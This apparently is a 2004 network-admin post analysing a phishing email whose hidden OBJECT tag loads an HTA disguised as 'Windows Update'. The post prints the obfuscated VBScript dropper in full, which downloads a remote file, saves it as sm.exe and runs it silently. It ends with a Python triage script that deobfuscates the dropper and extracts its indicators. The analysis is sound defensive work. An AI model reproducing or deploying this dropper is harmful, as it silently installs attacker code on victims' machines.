Contains an ActiveX control:
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<HTML><HEAD>
<META http-equiv=Content-Type content="text/html; charset=iso-8859-1">
<META content="MSHTML 6.00.2800.1400" name=GENERATOR></HEAD>
<BODY>
<DIV dir=ltr align=left></DIV>
<DIV class=OutlookMessageHeader lang=en-us dir=ltr align=left>
<HR tabIndex=-1>
<FONT face=Tahoma size=2><B>From:</B> My User
<B>Sent:</B> Thursday,
March 18, 2004 1:43 PM
<B>To:</B> Network Services
<B>Subject:</B> FW:
Site changes
</FONT>
</DIV>
<DIV></DIV>
<DIV><SPAN class=370044119-18032004><FONT face=Arial color=#0000ff size=2>can
someone tell me what this is? I don't know of this address and it seems
like there is some sort of attachment but nothing comes up.</FONT></SPAN></DIV>
<DIV class=OutlookMessageHeader dir=ltr align=left><FONT face=Tahoma
size=2>-----Original Message-----
<B>From:</B> 3Dmy.user@my.company.com
[mailto:3Dmy.user@my.company.com]
<B>Sent:</B> Thursday, March 18, 2004
1:38 PM
<B>To:</B> Lee Dufour
<B>Subject:</B> Site
changes
</FONT></DIV><FONT face=System>
<OBJECT style="DISPLAY: none"
data=http://68.235.202.221:81/802021.php></OBJECT></FONT></BODY></HTML>
That ActiveX control opens this .php file from a website.
The .php file is this:
<HTML>
<HEAD>
<TITLE>Windows Update</TITLE>
<HTA:APPLICATION ID="Q" APPLICATIONNAME="Q" BORDER="none" BORDERSTYLE="normal" CAPTION="no" ICON="" CONTEXTMENU="no" MAXIMIZEBUTTON="no" MINIMIZEBUTTON="no" SHOWINTASKBAR="no" SINGLEINSTANCE="no" SYSMENU="no" VERSION="1.0" WINDOWSTATE="minimize"/>
<SCRIPT LANGUAGE="VBScript">
MyFile = "q.vbs"
drte52f = "ileSyst"
Set FSO = CreateObject("Scripting.F"+drte52f+"emObject")
Set TSO = FSO.CreateTextFile(MyFile, True)
TSO.write "Dim BD" & vbcrlf
TSO.write "Dim xml" & vbcrlf
TSO.write "f5j545i = ""MLH""" & vbcrlf
TSO.write "Set xml = CreateObject(""Microsoft.X""+f5j545i+""TTP"")" & vbcrlf
TSO.write "xml.Open ""GET"", ""http://68.235.202.221:81/eidvtfb.jpeg"", False" & vbcrlf
TSO.write "xml.Send" & vbcrlf
TSO.write "C=C=C=C" & vbcrlf
TSO.write "BD = xml.ResponseBody" & vbcrlf
TSO.write "C=C=C=C" & vbcrlf
TSO.write "Const adTypeBinary = 1" & vbcrlf
TSO.write "Const adSaveCreateOverWrite = 2" & vbcrlf
TSO.write "C=C=C=C" & vbcrlf
TSO.write "Dim BinaryStream" & vbcrlf
TSO.write "C=C=C=C" & vbcrlf
TSO.write "Set BinaryStream = CreateObject(""ADODB.Stream"")" & vbcrlf
TSO.write "BinaryStream.Type = adTypeBinary" & vbcrlf
TSO.write "A=A=A=A" & vbcrlf
TSO.write "BinaryStream.Open" & vbcrlf
TSO.write "BinaryStream.Write BD" & vbcrlf
TSO.write "b=b=b=b" & vbcrlf
TSO.write "BinaryStream.SaveToFile ""sm.exe"", adSaveCreateOverWrite" & vbcrlf
TSO.write "Dim WshShell" & vbcrlf
TSO.write "Set WshShell = CreateObject(""WScript.Shell"")" & vbcrlf
TSO.write "WshShell.Run ""sm.exe"", 0, false" & vbcrlf
TSO.close
Set TSO = Nothing
Set FSO = Nothing
Dim WshShell
Set WshShell = CreateObject("WScript.Shell")
WshShell.Run "q.vbs", 0, false
</SCRIPT>
<script>window.close()</script>
</HEAD>
</HTML>
We blocked this IP, 68.235.202.221, in the PIX for now...
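A triage helper for the dropper quoted above, added here as an example (it is not part of the original post): it undoes the `"Scripting.F"+drte52f+"emObject"` string-splitting so the COM objects actually instantiated are visible, and pulls out the download URL, the file written and the file run, which is the minimum a defender needs to justify the block. The embedded sample is a constructed excerpt of the quoted HTA with the padding lines left out; the URL and file names are the ones shown in the post.

```python
import re

# Constructed excerpt of the quoted 802021.php dropper (padding lines such
# as C=C=C=C omitted); the values are the ones shown in the post.
SAMPLE = r'''<HTA:APPLICATION ID="Q" WINDOWSTATE="minimize"/>
<SCRIPT LANGUAGE="VBScript">
drte52f = "ileSyst"
Set FSO = CreateObject("Scripting.F"+drte52f+"emObject")
TSO.write "f5j545i = ""MLH""" & vbcrlf
TSO.write "Set xml = CreateObject(""Microsoft.X""+f5j545i+""TTP"")" & vbcrlf
TSO.write "xml.Open ""GET"", ""http://68.235.202.221:81/eidvtfb.jpeg"", False" & vbcrlf
TSO.write "Set BinaryStream = CreateObject(""ADODB.Stream"")" & vbcrlf
TSO.write "BinaryStream.SaveToFile ""sm.exe"", adSaveCreateOverWrite" & vbcrlf
TSO.write "Set WshShell = CreateObject(""WScript.Shell"")" & vbcrlf
TSO.write "WshShell.Run ""sm.exe"", 0, false" & vbcrlf
</SCRIPT>'''

ASSIGN = re.compile(r'\b([A-Za-z_]\w*)\s*=\s*"([^"]*)"')      # x = "lit"
VAR_IN_CONCAT = re.compile(r'\+\s*([A-Za-z_]\w*)(?=\s*[+)])')  # "a"+x+"b"
LIT_CONCAT = re.compile(r'"([^"]*)"\s*\+\s*"([^"]*)"')         # "a"+"b"

def deobfuscate(script):
    """Undo the VBScript ""-escaping of the written q.vbs text, then fold the
    literal+variable+literal trick that hides each CreateObject ProgID."""
    text = script.replace('""', '"')
    consts = dict(ASSIGN.findall(text))          # e.g. drte52f -> ileSyst
    text = VAR_IN_CONCAT.sub(lambda m: '+"%s"' % consts[m.group(1)] if m.group(1) in consts else m.group(0), text)
    while True:                                  # fold until nothing changes
        folded = LIT_CONCAT.sub(lambda m: '"' + m.group(1) + m.group(2) + '"', text)
        if folded == text:
            return text
        text = folded

def triage(script):
    """ProgIDs instantiated, remote URLs, files written/run, and a verdict."""
    plain = deobfuscate(script)
    progids = re.findall(r'CreateObject\("([^"]+)"\)', plain)
    urls = re.findall(r'https?://[^\s"<>]+', plain)
    saved = re.findall(r'SaveToFile\s+"([^"]+)"', plain)
    run = re.findall(r'\.Run\s+"([^"]+)"', plain)
    chain = bool(urls and saved and run and {'Microsoft.XMLHTTP', 'ADODB.Stream',
                                            'WScript.Shell'} <= set(progids))
    return {'hta': '<HTA:APPLICATION' in script, 'progids': progids, 'urls': urls,
            'saved': saved, 'run': run,
            'verdict': 'download-and-execute dropper' if chain else 'no full chain'}

if __name__ == '__main__':
    for key, value in triage(SAMPLE).items():
        print('%-8s %s' % (key, value))
```

The URL list is what goes into the firewall rule; the ProgID list is what a host-side rule on script-to-COM activation (XMLHTTP plus ADODB.Stream plus WScript.Shell from one script) would key on.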